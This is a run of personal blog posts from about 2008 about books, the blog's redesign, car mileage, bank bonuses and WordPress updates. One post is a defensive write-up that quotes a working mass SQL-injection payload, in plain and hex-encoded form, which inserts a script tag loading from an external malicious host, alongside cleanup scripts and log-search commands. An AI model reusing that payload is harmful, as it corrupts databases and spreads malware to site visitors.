Isn’t it an invasion of privacy? Sounds more like an abuse of power – he’s sporting some Ron Paul stickers and he was scrutinized.

I see this and I immediatly think of the Usual Suspects where McManus says “Give me the fucking keys, you fucking cocksucking motherfucker, aaarrrghh.”

Since 2008 is behind us, and not a moment too soon, I decided to share with you my favorite new website of the year.

Actually, this started out as my top ten favorite new websites of the year, but the truth is that none of them could really compare to this one site.

So I give you Daily Lit.

Daily Lit lets you sign up for an email that will send you a small installment of a book every day, at the time of your choice.

Here’s how it works:

1. Go to the site and pick a book.

1. Give them your email address, and select the time of day you want it sent to you.

That’s it. They will ask you to confirm that you are the one that requested the book, and you get your first installment about 24 hours later. At the end of each installment is a button to get the next installment right away, and another to adjust the length of the installments that come in. (You can get them from a couple paragraphs at a time, to a few pages at a time.)

Here is the best part: over 800 books are FREE. No cost at all. You don’t even have to sign up for an account, or put up with Spam. Just give them an email address.

New releases and books that are still under copy right seem to start at prices of around $4. Very reasonable.

But the vast majority of the books available on this site are free.

I’m currently reading two books through this service.

The Adventures of Sherlock Holmes (FREE)

and

Little Brother (FREE)

Little Brother is a techno thriller based in a dystopian future after a terrorist attack on San Francisco allows the government to pass The Patriot Act II. It’s fast paced and interesting, well worth the read, but better suited for this medium rather than a printed book. You’ll see what I mean when you read it.

This website is valuable, and we need to support it. Please take a moment to look at it, at the least, and buy a book from it if you can.

Wetwired is not a finalist in the 2008 Blog Awards. Which means… we’ll have to work double hard in 2009 to improve the site.   Part of that I think will come with getting some help on the coding side to make sure that the site actually does work on every browser correctly.

In retrospect I think I need to go back to the drawing board on the site and come up with something truly unique and graphically pleasing. But As I have discussed with others, what good is a great design if you don’t have great content so we’ll also have to double our efforts in the content side of Wetwired.   The design of the site has been with a central theme for the past couple of years and we all agree that the theme is pretty unique.   I think its most likely usability.

2008 Wetwired in Review

This year has been an interesting year.  Considering the previous year was a do-nothing year.  Meaning we really didn’t do a damn thing.  I didn’t update the site, we hardly posted, we kind of took the year off.  2008 on the other hand had major changes.

We switched from Movable Type to Wordpress.

We switched hosts to go-daddy (saving a ton of money at the sacrifice of speed).

We contracted a new artist to re-do the artwork that had previously got us into the finals of best blog design of 2005.

We finalized the new design(mostly).  Aside from the footer part taking until November to get complete…

We started, for the fist time in the 8 year history of Wetwired, to put up advertisements.  Google Adsense, and a few products that we’ve tested ourselves.  While stylistically it goes against everything  I hate; it made sense.  Believe it or not Wetwired is just about paying for itself (cost of domain and monthly hosting).   That in itself is something I really didn’t expect.

Wetwired has seen the most traffic it has ever seen this year.  And we’ve doubled our daily traffic from last year.

We have had a semi-regular podcast for the first time ever and it has been fairly successful.  Including being on itunes.

We’ve had the re-appearance of Beerslinger from his 2 year hiatus.  And we’ve had a couple new writers come on board (prax and larkynm) who unfortunately post infrequently, but are a welcome addition none the less.

We have been interviewed by the Daily Texan (UT paper) and we recorded the interview and offered it up as a podcast.

And lastly I think I’ve updated wordpress versions 6 times this year with some major changes on the back end.  It’s been a pretty good year for them as they (wordpress) have added some great functionality and some great user options in an overhaul of the administration side.

Wetwired in 2009

I think 2009 will be a continued rebuilding year as we look for more local Austin writers who are interested in contributing (for free).   When I look at the amount of money pumped into the site it will be a while before we regain it through advertisement etc but I do see the site fully paying for itself, the operating costs so to speak, and I think we can look forward to having some surprises for our few loyal readers with anything we have left over.

When it comes to traffic, we’ll be working hard to continue to optimize wetwired and post more original content and/or commentary that is of interest and that continues to add readership.  I suspect that if we actually get on the ball this year we could potentially finally break out of the small blog arena.  You would think that after 8 years of being a website/blog that we’d have more traffic.. but Finley, Beerslinger and I all atribute the slowness to 3 potential things.  1. Laziness.  2. Alcohol.  3. Waking up in the morning in the front yard and realizing that those are not our flamingos…

Lastly, Austin has a booming local blogging scene.  With freaking monthly meet-ups!  I’ve personally been in Austin since late 2000 and never been to one, yet we’ve been posting here for quite some time.  I have met (albeit briefly) one other local austin blogger.  She was doing an imprav with Cold-Towne Theatre.   So at some point I suspect that we’ll come out of our holes and make an appearance at one of the local Austin meetings.

As the 2009 looks fairly bleak when it comes to the economy, I think Wetwired will do just fine.

Postscript

If you are interested in contributing articles to wetwired or interested in just getting involved in a project let us know by commenting.  We’ll be on the lookout for new talent, and/or we wouldn’t mind showing someone the administration side if you just want to learn.

“The hardest thing to explain is the glaringly evident which everybody had decided not to see.”  Ayn Rand

Some of you may know that I have a 2006 VW Passat.  These come with a standard 50,000 mile factory warranty.   VW is a pretty good brand, the cars usually last a while but when the warranty runs out you have to be prepared for potential larger costs.   Like many cars that are mid range and have all of the gadgets included in them, there is plenty of likely hood for things to fail.  So far my entire A/C has been replaced as well as my throttle body and a few other components for two unrelated issues.  So with its current track record I’m fairly certain something else will go wrong between now and 100,000 miles.  At purchase I did not buy the extended warranty; I elected to review if it was going to be needed based on how it  performed.   Now as I’m entering my 3rd year of ownership of this vehicle I’m seriously thinking about extending that warranty to 100,000 miles.

The one thing I’m trying desperately to do is to put off having to shell out that extra couple grand for that extended warranty.   So how do you do that?  You keep the miles off.   You work from home a couple days a week, you try not to take it for long road trips etc.  It’s not out of the ordinary and in fact years previously when I was not as concerned about my cars mileage, my friends had asked me to drive so they could keep the miles off their vehicles when they were faced with the longevity or useful lifespan of their cars.

My Subaru WRX I put 40,000 miles on in two years.  I was out of warranty before that 2nd year was up because it only had a 3 year 36,000 mile one.  I didn’t bother with the extended warranty after the fact and actually when the car really needed a lot of work I just traded it in as is and got the Passat.   Prior to that I had a used Mitsubishi Mirage.  I bought it with 15,000 miles on it and quickly put an additional 45,000 miles on it in a year and a half.   It met its end at 97,000 miles after 4 years of ownership.  Again I really didn’t mind too much about the miles, the car was a daily driver type of car; the maintenance was inexpensive on it and it was my first car.

Mimzy on the other hand, has a vehicle that is 8 years old and has only 93,000 miles on it.  That means that she only put about 11,000 miles on it a year.   To top it off she lives less than a mile from her work place so she’s not putting much on it still.  In comparison, even for the first time in my life when I’m trying to keep the miles down on my car, I’ve still managed to put on 18,000 per year for the first two years.  Which means that I’ll have 54,000 miles on my car by October 2009.  3 years and 54,000 miles.  I really would like to get to that 4th year of ownership before I have to shell out more for peace of mind.   The only thing I can do to keep the miles down is to be very sparing on my driving and not take any long trips.

The rub is that people still have this expectation that I’m always willing to donate my car for the cause. They expect that because my car is “new” and only has 36,000 miles it would be great to take the vehicle on a long road trip for Christmas.   I’m sorry but I’ve been the one that has donated my car continually in the past for others interests.  Now is the time for my interests when I am faced with the longevity and lifespan of my car.

I’ve heard word that it is coming out today or tomorrow.  There are some major changes in the way it looks as far as the admin console is concerned.  I have not yet pulled it down to test but I plan on it prior to rolling out on wetwired proper.

One of the new features I’m interested in is the new graphics/buttons that were designed in a contest.

Wetwired is gunning for the Best Blog Design of 2008.

We were a finalist in 2005 for the Best Blog design.. unfortunatly we didn’t win.  But…we’re back again with a new design this year we hope to do well again.

Go here to look at what the site looked like back then.

So the rules are – we’ve already been nominated so if you’d like to 2nd or 3rd it please go click on the (+) icon next to wetwired. Go here to check it out.

HOLY SHIT-SICLE(similar to a popsicle only made of shit).  WaMu goes and hires a new CEO to help them through their troubled times and guess what happens, Alan H. Fishman, throw’s on his “golden-glowing-billowing parachute” and jumps out of a window with cash falling out of his pockets.  (I wish I could draw..).  Not just pockets full of cash but bank accounts full, 20 million dollars.

According to filings with the Securities and Exchange Commission, WaMu threw a $7.5 million bonus at Fishman when it hired him on Sept. 8, and guaranteed him an immediate cash severence of $11.6 million — both of which he gets to keep.

He also was eligible for annual bonuses of up to 365 percent of his annual base pay — set at $1 million — to go with millions of shares of company stock.

Fishman does lose out on a big bonus that would have kicked in had he remained on the job through 2009.

Oh, say it ain’t so, he will miss out on that big bonus.

Documents show WaMu was going to pay their new boss $8 million to simply not screw up and get fired — all negotiated as the Seattle-based banking giant’s loses climbed to an estimated $20 billion.

Wow, I would love a job where I could get paid 8 million to just not screw up enough to get fired.  Seriously, I guess I need to find a bank that is failing…

CNBC is breaking news at this moment that Morgan Stanley has officially opened talks to merge with Wachovia. Morgan Stanley has been talking with China to raise capital and is continuing to do so. More as this develops.

Wikipedia says,

“SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.”

New SQL injection variant I stumbled on at work

Basically what it does is open 2 iframes and then installs a cookie – its also injecting into whatever database is there, I have not gone through all the code but it has already changed since this morning.  It is a very bad little piece of java.

*** DO NOT GO TO THIS URL (I have added spaces to eliminate accidental cllicking)***

Here is the code for the new injection:

BEGIN exec(‘update ['+@T+'] set ['+@C+']=['+@C+']+””></title><script src=”http://jjmaoduo. 3322.org/csrss/w.js”></script><!–” where ‘+@C+’ not like ”%”></title><script src=”http://jjmaoduo. 3322.org/csrss/w.js”></script><!–”’)

Notice the beginning of the insert. Its not your traditional <script= its “></title><script src=

Bastards did it to move around the reverse script cleaning method. Here is a modified script taking into account the new “”></title><script src=” code. Oh also notice the closed html comment. This was to fight off the previous </script> for the WHERE clause on the cleaning script.

/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(‘update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar (max),['+@C+'])), len(convert(varchar (max),['+@C+'])) – (patindex(”%<eltit/><”%”, reverse(convert(varchar (max),['+@C+']))) + 9))) where ['+@C+'] like ”%”></title>%<!–”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/

The old cleaning script is below for looking at my references above.
/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(‘update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar (max),['+@C+'])), len(convert(varchar (max),['+@C+'])) – (patindex(”%tpircs<%”, reverse(convert(varchar (max),['+@C+']))) + 6))) where ['+@C+'] like ”%<script%</script>”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/

To find out which web pages are being hit go to the root of your web logs..

In iis there should be a site identifier that will help you to locate which site it is.

From the root of the web logs issue this command:
(this will search todays logs.. its its yesterday search then)

findstr /s /i /n /c:”declare” ex080807.log &gt;&gt; sql_inj_sites_080807.txt

This will check all recursive sub-folders for the word declare.

If you check that text file you probably have something that looks like this:

W3SVC12345678\ex080807.log:99:2008-08-07 12:57:12 W3SVC12345678 MY-WEBSERVER-HOSTNAME 67.42.4.85 GET /index.asp?topic=4;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 200

I truncated some of the rest of the stuff because its not important.. EXCEPT for the http return code

200 is ofcourse OK which means the webserver processes the request.

So a query string in index.asp located in the following website: W3SVC12345678.

You can find out which site that is by going into inetmgr and looking in the site identifier field.

If you are also a little more curious you can find the SQL code that is being injected by translating the hex after the 0x and before the %20AS% into ascii and that will give you the SQL code being used.

Comments/Questions etc.  Thanks.

Itunes app store has finnally got one if the most important blog applications available for download: Wordpress. It is everything I expected and more. This is very cool addition to the iphone apps as we have more and more mobile bloggers emerging.

The application was released last night on the app store and I have just pulled it down on my iPhone and tested, the begining of this post was done completely on the iPhone.  I came back in and added the image.  In testing it allows you to add tags separated by commas, choose multiple categories or create new ones and allows you to create a local draft that stays only on the iphone or save as a draft to your blog.

From the Wordpress site:

Introducing the first Open Source app that lets you write posts, upload photos, and edit your WordPress blog from your iPhone or iPod Touch. With support for both WordPress.com and self-hosted WordPress (2.5.1 or higher), users of all experience levels can get going in seconds.

Very cool.

This is a two-for-wednesday.  It would have been Tuesday but yeah… coding problems.

Number one:  As you can see wetwired has the new look that we promised.  I’ve been working on coding this for a while and given that I hate coding for wordpress, I think its turned out reasonably well.  There are slight issues with the sidebar and different browsers.  I’ll be continually working on it to try to address the issues that crop up.   Incedently if anyone is good with wordpres and divs and this stupid widgetized sidebar and can figure out why the twitter stuff loads 5 different ways from sunday on every browser, please let me know.

Number two: Wordpress 2.6 has been released.  This means new features for us, and maybe for you.  I tested slightly on our sandbox to verify all hell didn’t break loose and I’ve now updated wetwired to this latest version.  Let me know if you see something broken I might fix it, or I might laugh in your face.

Many of you know that what is up on this site now is a temporary holding pattern for a fresh design.  Our artist has finnally finished up the new logo.  So without further ado:

You may or may not notice, but wetwired has been running extremly slow this morning and it was running slow last night.  At times it takes over 1 minute to load the page.  I have done some extensive troubleshooting with firefox, and firebug plugin and after turning off all plugins – defaulting back to the generic theme of wordpress all signs point to DB queries being the problem – meaning my host (godaddy) is having DB issues or performance issues.  Posting a static page works just fine and displays correctly.  I also noticed that they just updated php on the godaddy servers – who knows this could also be a factor.

I did some searching to see if there were wordpress performance posts or insight and there was – but I’ve covered the basis for reasons why it would be slow as notated above.  I can only wait until my host gets back to me.  Incidentally, when you call them you get a phone person who is nice but is not technical.  They then tell you they will escalate the issue and you’ll get an email back in a couple hours.  It’s been a couple hours.. no word.  We’ll see how good their support is.

Just updated to Wordpress 2.5.1 which contains 70 or so fixes and some security bugs etc.  Additionally they add a hash to the cookies which is specific to the site that makes it harder to hack.  Anyway, you guys won’t notice much, that changes are mostly all back end.